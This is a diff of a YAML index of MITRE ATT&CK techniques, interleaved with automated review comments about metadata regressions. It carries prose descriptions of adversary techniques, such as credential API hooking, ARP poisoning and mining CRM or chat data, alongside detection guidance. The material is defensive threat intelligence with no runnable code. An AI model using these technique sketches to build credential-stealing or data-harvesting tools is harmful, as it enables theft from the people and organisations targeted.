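Review bot: the four-entry `x_mitre_permissions_required` list (Administrator, SYSTEM, root, User) is deleted from T1056 without a replacement, while the T1602.001 object later in this diff keeps its `x_mitre_permissions_required: - Administrator` block. If the upstream data model has retired this field, the remaining occurrence is stale and the removal should be called out in the description; if it has not, this is data loss for T1056. The `+ revoked: false` line here, like `+ x_mitre_deprecated: false` in the previous hunk, materialises a default value rather than changing status; a sentence in the description saying so would stop readers from interpreting it as a revocation decision.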
@@ -41415,9 +41962,60 @@ collection:
url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1213.004:
+ technique:
+ modified: '2024-10-17T14:36:24.983Z'
+ name: Customer Relationship Management Software
+ description: |-
+ Adversaries may leverage Customer Relationship Management (CRM) software to mine valuable information. CRM software is used to assist organizations in tracking and managing customer interactions, as well as storing customer data.
+
+ Once adversaries gain access to a victim organization, they may mine CRM software for customer data. This may include personally identifiable information (PII) such as full names, emails, phone numbers, and addresses, as well as additional details such as purchase histories and IT support interactions. By collecting this data, an adversary may be able to send personalized [Phishing](https://attack.mitre.org/techniques/T1566) emails, engage in SIM swapping, or otherwise target the organization’s customers in ways that enable financial gain or the compromise of additional organizations.(Citation: Bleeping Computer US Cellular Hack 2022)(Citation: Bleeping Computer Mint Mobile Hack 2021)(Citation: Bleeping Computer Bank Hack 2020)
+
+ CRM software may be hosted on-premises or in the cloud. Information stored in these solutions may vary based on the specific instance or environment. Examples of CRM software include Microsoft Dynamics 365, Salesforce, Zoho, Zendesk, and HubSpot.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Centre for Cybersecurity Belgium (CCB)
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Logon Session: Logon Session Creation'
+ - 'Application Log: Application Log Content'
+ type: attack-pattern
+ id: attack-pattern--bbfbb096-6561-4d7d-aa2c-a5ee8e44c696
+ created: '2024-07-01T20:06:13.664Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/004
+ external_id: T1213.004
+ - source_name: Bleeping Computer Bank Hack 2020
+ description: Ionut Ilascu. (2020, January 16). Customer-Owned Bank Informs
+ 100k of Breach Exposing Account Balance, PII. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/customer-owned-bank-informs-100k-of-breach-exposing-account-balance-pii/
+ - source_name: Bleeping Computer Mint Mobile Hack 2021
+ description: Lawrence Abrams. (2021, July 10). Mint Mobile hit by a data breach
+ after numbers ported, data accessed. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/mint-mobile-hit-by-a-data-breach-after-numbers-ported-data-accessed/
+ - source_name: Bleeping Computer US Cellular Hack 2022
+ description: Sergiu Gatlan. (2022, January 4). UScellular discloses data breach
+ after billing system hack. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/uscellular-discloses-data-breach-after-billing-system-hack/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1557.002:
technique:
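Review bot: the new T1213.004 object ships with `x_mitre_detection: ''` and no `identifier:` key, whereas the neighbouring entries T1114.003, T1056.002, T1039 and T1114.002 each carry `identifier: <technique id>` directly before `atomic_tests: []`. If `identifier` is meant to be present on every entry, it is also absent from T1074 and T1056 in this diff, so the generator's rule for emitting it needs documenting or fixing. The empty detection string is acceptable when the upstream entry has none, but since `x_mitre_data_sources` does list `Logon Session: Logon Session Creation` and `Application Log: Application Log Content`, consumers that render detection guidance should treat the empty string as "no upstream text" rather than as missing data; worth a note in the description.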
@@ -41463,7 +42061,7 @@ collection:
The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-22T18:37:22.176Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: ARP Cache Poisoning
x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
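Review bot: the `modified` timestamp for T1557.002 moves backwards, from 2022-11-08T14:00:00.188Z to 2022-07-22T18:37:22.176Z. A regeneration from a newer ATT&CK release should only move `modified` forward, so an earlier value indicates the previous snapshot was built from a different source bundle than this one (T1602.001 further down shows the same pattern, 2021-04-29 to 2020-10-22). Please confirm which upstream bundle was used and record it in the description; otherwise tooling that compares `modified` to detect updated techniques will misreport these objects.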
@@ -41482,37 +42080,36 @@ collection:
- 'Network Traffic: Network Traffic Flow'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1213.003:
technique:
- modified: '2022-10-18T22:44:01.723Z'
+ modified: '2024-09-04T13:03:54.101Z'
name: Code Repositories
description: |-
Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.
- Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
+ Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or [Unsecured Credentials](https://attack.mitre.org/techniques/T1552) contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
**Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Toby Kohlenberg
+ - Josh Liburdi, @jshlbrd
+ x_mitre_deprecated: false
x_mitre_detection: Monitor access to code repositories, especially performed
by privileged users such as Active Directory Domain or Enterprise Administrators
as these types of accounts should generally not be used to access code repositories.
In environments with high-maturity, it may be possible to leverage User-Behavioral
Analytics (UBA) platforms to detect and alert on user-based anomalies.
- x_mitre_platforms:
- - SaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Toby Kohlenberg
- - Josh Liburdi, @jshlbrd
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
@@ -41535,41 +42132,52 @@ collection:
url: https://krebsonsecurity.com/2013/10/adobe-to-announce-source-code-customer-data-breach/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1213:
technique:
- modified: '2024-03-01T16:27:47.391Z'
+ modified: '2024-10-28T19:10:16.960Z'
name: Data from Information Repositories
description: "Adversaries may leverage information repositories to mine valuable
information. Information repositories are tools that allow for storage of
information, typically to facilitate collaboration or information sharing
between users, and can store a wide variety of data that may aid adversaries
- in further objectives, or direct access to the target information. Adversaries
- may also abuse external sharing features to share sensitive documents with
- recipients outside of the organization. \n\nThe following is a brief list
- of example information that may hold potential value to an adversary and may
- also be found on an information repository:\n\n* Policies, procedures, and
- standards\n* Physical / logical network diagrams\n* System architecture diagrams\n*
- Technical system documentation\n* Testing / development credentials\n* Work
- / project schedules\n* Source code snippets\n* Links to network shares and
- other internal resources\n\nInformation stored in a repository may vary based
- on the specific instance or environment. Specific common information repositories
- include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002)
- and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific
- services such as Code Repositories, IaaS databases, enterprise databases,
- and other storage infrastructure such as SQL Server."
+ in further objectives, such as Credential Access, Lateral Movement, or Defense
+ Evasion, or direct access to the target information. Adversaries may also
+ abuse external sharing features to share sensitive documents with recipients
+ outside of the organization (i.e., [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).
+ \n\nThe following is a brief list of example information that may hold potential
+ value to an adversary and may also be found on an information repository:\n\n*
+ Policies, procedures, and standards\n* Physical / logical network diagrams\n*
+ System architecture diagrams\n* Technical system documentation\n* Testing
+ / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
+ \n* Work / project schedules\n* Source code snippets\n* Links to network shares
+ and other internal resources\n* Contact or other sensitive information about
+ business partners and customers, including personally identifiable information
+ (PII) \n\nInformation stored in a repository may vary based on the specific
+ instance or environment. Specific common information repositories include
+ the following:\n\n* Storage services such as IaaS databases, enterprise databases,
+ and more specialized platforms such as customer relationship management (CRM)
+ databases \n* Collaboration platforms such as SharePoint, Confluence, and
+ code repositories\n* Messaging platforms such as Slack and Microsoft Teams
+ \n\nIn some cases, information repositories have been improperly secured,
+ typically by unintentionally allowing for overly-broad access by all users
+ or even public access to unauthenticated users. This is particularly common
+ with cloud-native or cloud-hosted services, such as AWS Relational Database
+ Service (RDS), Redis, or ElasticSearch.(Citation: Mitiga)(Citation: TrendMicro
+ Exposed Redis 2020)(Citation: Cybernews Reuters Leak 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
x_mitre_contributors:
- - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
- Regina Elwell
- Praetorian
- Milos Stojadinovic
- Isif Ibrahima, Mandiant
+ - Obsidian Security
+ - Naveen Vijayaraghavan
+ - Nilesh Dherange (Gurucul)
x_mitre_deprecated: false
x_mitre_detection: "As information repositories generally have a considerably
large user base, detection of malicious use can be non-trivial. At minimum,
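Review bot: the T1213 description is a double-quoted flow scalar with literal `\n` escapes wrapped across lines, which makes the substantive text changes in this hunk (the added "Credential Access, Lateral Movement, or Defense Evasion" clause, the PII bullet, the storage/collaboration/messaging platform list, the improperly-secured-repository paragraph and the three new citations) nearly impossible to read in a diff. Sibling objects in this file (T1213.003, T1213.004, T1056.004) use a `|-` block scalar for the same field; converting T1213 to that style would make future edits reviewable. Also verify the contributor change against the upstream object: the single entry `Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)` becomes two separate entries plus `Obsidian Security`, which changes the attributed contributor count and could be a comma-split artifact rather than an upstream edit. The citations `Mitiga`, `TrendMicro Exposed Redis 2020` and `Cybernews Reuters Leak 2022` introduced in this description get their matching `external_references` entries in later hunks, so that part is consistent.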
@@ -41598,10 +42206,9 @@ collection:
- Windows
- macOS
- SaaS
- - Office 365
- - Google Workspace
- IaaS
- x_mitre_version: '3.3'
+ - Office Suite
+ x_mitre_version: '3.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
@@ -41614,10 +42221,20 @@ collection:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1213
external_id: T1213
+ - source_name: Mitiga
+ description: Ariel Szarf, Doron Karmi, and Lionel Saposnik. (n.d.). Oops,
+ I Leaked It Again — How Mitiga Found PII in Exposed Amazon RDS Snapshots.
+ Retrieved September 24, 2024.
+ url: https://www.mitiga.io/blog/how-mitiga-found-pii-in-exposed-amazon-rds-snapshots
- source_name: Atlassian Confluence Logging
description: Atlassian. (2018, January 9). How to Enable User Access Logging.
Retrieved April 4, 2018.
url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+ - source_name: TrendMicro Exposed Redis 2020
+ description: David Fiser and Jaromir Horejsi. (2020, April 21). Exposed Redis
+ Instances Abused for Remote Code Execution, Cryptocurrency Mining. Retrieved
+ September 25, 2024.
+ url: https://www.trendmicro.com/en_us/research/20/d/exposed-redis-instances-abused-for-remote-code-execution-cryptocurrency-mining.html
- source_name: Microsoft SharePoint Logging
description: Microsoft. (2017, July 19). Configure audit settings for a site
collection. Retrieved April 4, 2018.
@@ -41626,11 +42243,14 @@ collection:
description: Microsoft. (n.d.). Sharepoint Sharing Events. Retrieved October
8, 2021.
url: https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events
+ - source_name: Cybernews Reuters Leak 2022
+ description: Vilius Petkauskas . (2022, November 3). Thomson Reuters collected
+ and leaked at least 3TB of sensitive data. Retrieved September 25, 2024.
+ url: https://cybernews.com/security/thomson-reuters-leaked-terabytes-sensitive-data/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1602.001:
technique:
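Review bot: the new `Cybernews Reuters Leak 2022` reference carries a stray space before the period in the author field (`Vilius Petkauskas .`), which will appear verbatim wherever the citation is rendered. If the generator copies description strings straight from the upstream bundle, fix it upstream or normalise whitespace before punctuation in the generator; if the text is hand-edited here, drop the space. The `spec_version: '2.1'` removal follows the same pattern as the rest of this diff and should be covered by a single explanation in the description rather than left for each object.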
@@ -41667,7 +42287,7 @@ collection:
description: Cisco. (2008, June 10). Identifying and Mitigating Exploitation
of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October
19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T01:54:22.812Z'
name: SNMP (MIB Dump)
description: "Adversaries may target the Management Information Base (MIB) to
collect and/or mine valuable information in a network managed using Simple
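Review bot: `modified` for T1602.001 goes from 2021-04-29T14:49:39.188Z back to 2020-10-22T01:54:22.812Z, the second backward-moving timestamp in this diff (T1557.002 is the other). Because the rest of the object is untouched, `modified` is the only signal a consumer has that the entry changed, and a regression in it will confuse anything that sorts or filters techniques by last update. Confirm the ATT&CK release this was generated from and note it in the description, or regenerate from the release the previous snapshot used.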
@@ -41699,115 +42319,182 @@ collection:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1056.004:
technique:
- x_mitre_platforms:
- - Windows
+ modified: '2024-08-27T21:03:56.385Z'
+ name: 'Input Capture: Credential API Hooking'
+ description: |
+ Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
+
+ * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
+ * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+ * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
+
+ Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
+
+ Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
x_mitre_domains:
- enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Process: Process Metadata'
+ - 'Process: OS API Execution'
type: attack-pattern
+ id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
created: '2020-02-11T19:01:15.930Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1056.004
url: https://attack.mitre.org/techniques/T1056/004
+ external_id: T1056.004
+ - source_name: EyeofRa Detecting Hooking June 2017
+ description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+ against user-land. Retrieved December 12, 2017.'
+ url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+ - source_name: Zairon Hooking Dec 2006
+ description: Felici, M. (2006, December 6). Any application-defined hook procedure
+ on my machine?. Retrieved December 12, 2017.
+ url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+ - source_name: GMER Rootkits
+ description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+ url: http://www.gmer.net/
+ - source_name: MWRInfoSecurity Dynamic Hooking 2015
+ description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+ Mode. Retrieved December 20, 2017.'
+ url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+ - source_name: Elastic Process Injection July 2017
+ description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+ A Technical Survey Of Common And Trending Process Injection Techniques.
+ Retrieved December 7, 2017.'
+ url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+ - source_name: HighTech Bridge Inline Hooking Sept 2011
+ description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+ December 12, 2017.
+ url: https://www.exploit-db.com/docs/17802.pdf
- source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
Retrieved December 18, 2017.
url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
- - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+ - source_name: Microsoft Hook Overview
description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
- source_name: Microsoft Hook Overview
- - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
- A Technical Survey Of Common And Trending Process Injection Techniques.
- Retrieved December 7, 2017.'
- source_name: Elastic Process Injection July 2017
- - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
- description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
- Retrieved December 12, 2017.'
- source_name: Adlice Software IAT Hooks Oct 2014
- - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
- description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
- Mode. Retrieved December 20, 2017.'
- source_name: MWRInfoSecurity Dynamic Hooking 2015
- - url: https://www.exploit-db.com/docs/17802.pdf
- description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+ url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+ - source_name: Microsoft Process Snapshot
+ description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
December 12, 2017.
- source_name: HighTech Bridge Inline Hooking Sept 2011
- - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
- description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
- Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
- source_name: Volatility Detecting Hooks Sept 2012
- - url: https://github.com/prekageo/winhook
+ url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+ - source_name: PreKageo Winhook Jul 2011
description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
- source_name: PreKageo Winhook Jul 2011
- - url: https://github.com/jay/gethooks
+ url: https://github.com/prekageo/winhook
+ - source_name: Jay GetHooks Sept 2011
description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
12, 2017.
- source_name: Jay GetHooks Sept 2011
- - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
- description: Felici, M. (2006, December 6). Any application-defined hook procedure
- on my machine?. Retrieved December 12, 2017.
- source_name: Zairon Hooking Dec 2006
- - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
- description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
- against user-land. Retrieved December 12, 2017.'
- source_name: EyeofRa Detecting Hooking June 2017
- - url: http://www.gmer.net/
- description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
- source_name: GMER Rootkits
- - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
- description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
- December 12, 2017.
- source_name: Microsoft Process Snapshot
- - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+ url: https://github.com/jay/gethooks
+ - source_name: StackExchange Hooks Jul 2012
description: Stack Exchange - Security. (2012, July 31). What are the methods
to find hooked functions and APIs?. Retrieved December 12, 2017.
- source_name: StackExchange Hooks Jul 2012
- modified: '2022-04-25T14:00:00.188Z'
- name: 'Input Capture: Credential API Hooking'
- description: |
- Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
-
- * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
- * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
- * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+ url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+ - source_name: Adlice Software IAT Hooks Oct 2014
+ description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+ Retrieved December 12, 2017.'
+ url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+ - source_name: Volatility Detecting Hooks Sept 2012
+ description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+ Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+ url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ identifier: T1056.004
+ atomic_tests: []
+ T1213.005:
+ technique:
+ modified: '2024-10-16T14:22:49.146Z'
+ name: Messaging Applications
+ description: "Adversaries may leverage chat and messaging applications, such
+ as Microsoft Teams, Google Chat, and Slack, to mine valuable information.
+ \ \n\nThe following is a brief list of example information that may hold potential
+ value to an adversary and may also be found on messaging applications: \n\n*
+ Testing / development credentials (i.e., [Chat Messages](https://attack.mitre.org/techniques/T1552/008))
+ \n* Source code snippets \n* Links to network shares and other internal resources
+ \n* Proprietary data(Citation: Guardian Grand Theft Auto Leak 2022)\n* Discussions
+ about ongoing incident response efforts(Citation: SC Magazine Ragnar Locker
+ 2021)(Citation: Microsoft DEV-0537)\n\nIn addition to exfiltrating data from
+ messaging applications, adversaries may leverage data from chat messages in
+ order to improve their targeting - for example, by learning more about an
+ environment or evading ongoing incident response efforts.(Citation: Sentinel
+ Labs NullBulge 2024)(Citation: Permiso Scattered Spider 2023)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- x_mitre_detection: |-
- Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
-
- Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
-
- Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+ x_mitre_contributors:
+ - Menachem Goldstein
+ - Obsidian Security
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ - Office Suite
x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- - 'Process: Process Metadata'
- - 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- identifier: T1056.004
+ - 'Application Log: Application Log Content'
+ type: attack-pattern
+ id: attack-pattern--fb75213f-cfb0-40bf-a02f-3bad93d6601e
+ created: '2024-08-30T13:50:42.023Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/005
+ external_id: T1213.005
+ - source_name: Sentinel Labs NullBulge 2024
+ description: " Jim Walter. (2024, July 16). NullBulge | Threat Actor Masquerades
+ as Hacktivist Group Rebelling Against AI. Retrieved August 30, 2024."
+ url: https://www.sentinelone.com/labs/nullbulge-threat-actor-masquerades-as-hacktivist-group-rebelling-against-ai/
+ - source_name: Permiso Scattered Spider 2023
+ description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+ SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+ url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
+ - source_name: SC Magazine Ragnar Locker 2021
+ description: Joe Uchill. (2021, December 3). Ragnar Locker reminds breach
+ victims it can read the on-network incident response chat rooms. Retrieved
+ August 30, 2024.
+ url: https://www.scmagazine.com/analysis/ragnar-locker-reminds-breach-victims-it-can-read-the-on-network-incident-response-chat-rooms
+ - source_name: Guardian Grand Theft Auto Leak 2022
+ description: 'Keza MacDonald, Keith Stuart and Alex Hern. (2022, September
+ 19). Grand Theft Auto 6 leak: who hacked Rockstar and what was stolen?.
+ Retrieved August 30, 2024.'
+ url: https://www.theguardian.com/games/2022/sep/19/grand-theft-auto-6-leak-who-hacked-rockstar-and-what-was-stolen
